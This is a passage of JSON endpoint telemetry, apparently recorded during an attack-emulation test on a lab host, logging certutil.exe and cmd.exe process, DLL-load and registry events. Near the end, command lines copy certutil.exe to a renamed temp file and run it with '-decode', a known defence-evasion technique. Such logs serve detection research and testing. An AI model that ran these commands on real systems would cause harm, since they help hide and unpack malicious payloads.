"certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500740000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "samcli.dll", - "image_path": "C:\\Windows\\System32\\samcli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "dsrole.dll", - "image_path": "C:\\Windows\\System32\\dsrole.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "logoncli.dll", - "image_path": "C:\\Windows\\System32\\logoncli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573500890000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "registry", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\WINDOWS\\system32\\certutil.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "process", - "pid": 1688, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "terminate", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001062AD5501}" - }, - { - "event_type": "file", - "file_name": "CERTUTIL.EXE-CB7805D7.pf", - "file_path": "C:\\Windows\\Prefetch\\CERTUTIL.EXE-CB7805D7.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "process", - "pid": 4760, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573501040000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00106CAC5501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4308, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573501270016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501200016, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "event_type": "process", - "pid": 4308, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573501360000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010FEB35501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c copy %%windir%%\\\\system32\\\\certutil.exe %%temp%%tcm.tmp\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3940, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573501930000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501820000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "command_line": "cmd.exe /c copy C:\\WINDOWS\\\\system32\\\\certutil.exe C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3452, - "ppid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573502020000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}", - "unique_ppid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "file", - "file_name": "Temptcm.tmp", - "file_path": "C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573501980000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "process", - "pid": 3452, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-001055B95501}" - }, - { - "event_type": "process", - "pid": 3940, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-00105FB85501}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"cmd.exe /c %%temp%%tcm.tmp -decode c:\\file.exe\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 1852, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573502260000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502140000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1852, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573502300000, - "unique_pid": "{42FC7E13-CBE6-5C05-0000-0010F6BA5501}" - }, - { - "command_line": "cmd.exe /c C:\\Users\\bob\\AppData\\Local\\Temptcm.tmp -decode c:\\file.exe", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5572, - "ppid": 1852, - "process_name": "cmd.exe", - "process_path": 